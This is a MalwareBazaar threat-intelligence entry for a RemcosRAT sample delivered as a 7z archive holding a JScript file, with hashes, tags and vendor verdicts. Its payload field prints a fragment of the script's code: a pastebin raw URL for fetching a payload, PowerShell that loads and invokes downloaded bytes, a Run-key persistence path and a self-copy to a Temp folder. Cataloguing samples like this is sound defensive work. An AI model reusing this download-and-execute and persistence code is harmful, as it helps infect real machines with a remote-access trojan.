🤲🏼 NEW | abuse.ch Community Hub! Earn recognition 🏅 for the malware intelligence you share, climb the leaderboards 📈, and connect with like-minded contributors who share your hunting focus 🤝. Ready to unlock your profile? Go to the Community Hub →

MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 99b6692bedd84a5e92e3d7a9f24c826d913c31dfd55ca89bf6eee67f20ee221f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



RemcosRAT


Vendor detections: 5


Intelligence 5 IOCs YARA File information Comments

SHA256 hash: 99b6692bedd84a5e92e3d7a9f24c826d913c31dfd55ca89bf6eee67f20ee221f
SHA3-384 hash: 5650de478ce1e6cfc140e5b9e451ab1eeec4c4b10af017efd3105de421bdfb09f110c455fcd51c792e02e270de8f8874
SHA1 hash: a665babc70dffd107445ba2c95769facf900f7f9
MD5 hash: 759e89e62626686dc6e75bf9527dd9bb
humanhash: four-hot-wolfram-king
File name:AMERICAN GROUP.7z
Download: download sample
Signature RemcosRAT
File size:1'697 bytes
First seen:2024-09-07 17:35:29 UTC
Last seen:Never
File type: 7z
MIME type:application/x-rar
ssdeep 24:ZOrHbEzX1eCmkSobjSf8/87u+aWT2ku+8gLDCn71sSTgDrsW+toGbMMzya:ZS7SUkVSf8Ei+aWT2Y8OC71p0HJsSa
TLSH T1CB31D60C652A20921F62169E82979662FF07331039E1E57ABE4A1AF07926626B03BA41
TrID 61.5% (.RAR) RAR compressed archive (v5.0) (8000/1)
38.4% (.RAR) RAR compressed archive (gen) (5000/1)
Magika rar
Reporter JAMESWT_WT
Tags:7z closen-kozow-com remcos RemcosRAT Spam-ITA teste iluminati

Intelligence


File Origin
# of uploads :
1
# of downloads :
424
Origin country :
IT IT
File Archive Information

This file archive contains 1 file(s), sorted by their relevance:

File name:AMERICAN GROUP.js
File size:6'036 bytes
SHA256 hash: ca5a213e123d830ad88e6eb9da341326fa6ea6c5bb535069406f9454b5aecccc
MD5 hash: 709df3d382b86fffeda0e0c534206ec1
MIME type:text/plain
Signature RemcosRAT
Vendor Threat Intelligence
Verdict:
Malicious
Score:
90.9%
Tags:
Network Stealth
Result
Verdict:
Malicious
File Type:
JS File - Malicious
Payload URLs
URL
File name
https://pastebin.com/raw/FJggAB19','[System.AppDomain]::CurrentDomain.Load($byteArray).GetType(\x27ClassLibrary2.clasudo\x27).GetMethod(\x27ljdhsy\x27).Invoke($null,\x20[object[]]\x20(\x27','854442EcSgXw','vGZc576y/war/moc.nibetsap//:sptth','open','powershell','SOFTWARE\x5cMicrosoft\x5cWindows\x5cCurrentVersion\x5cRun','Script\x20executed','689836WPHWLl','756040qBgrac','3675448mLZADQ','winmgmts://./root/default:StdRegProv','MSXML2.ServerXMLHTTP.6.0','8cuyScM','Shell.Application','2651094HPQCid','4515290PqmGjP','ShellExecute','\x27,\x20\x27Name\x20Startup\x20ink\x27,\x20\x273\x27,\x20\x271\x27,\x20\x27Regedit\x20Name\x27));','ScriptFullName','Copy-Item\x20-Path\x20*.js\x20-Destination\x20C:\x5cWindows\x5cTemp\x5cDebug.js','C:\x5cWindows\x5cTemp\x5cDebug.js','responseText','$data\x20=\x20\x27','SetStringValue','GET','5AohiJg'];_0x4ef3=function()
JS File
Behaviour
BlacklistAPI detected
Gathering data
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments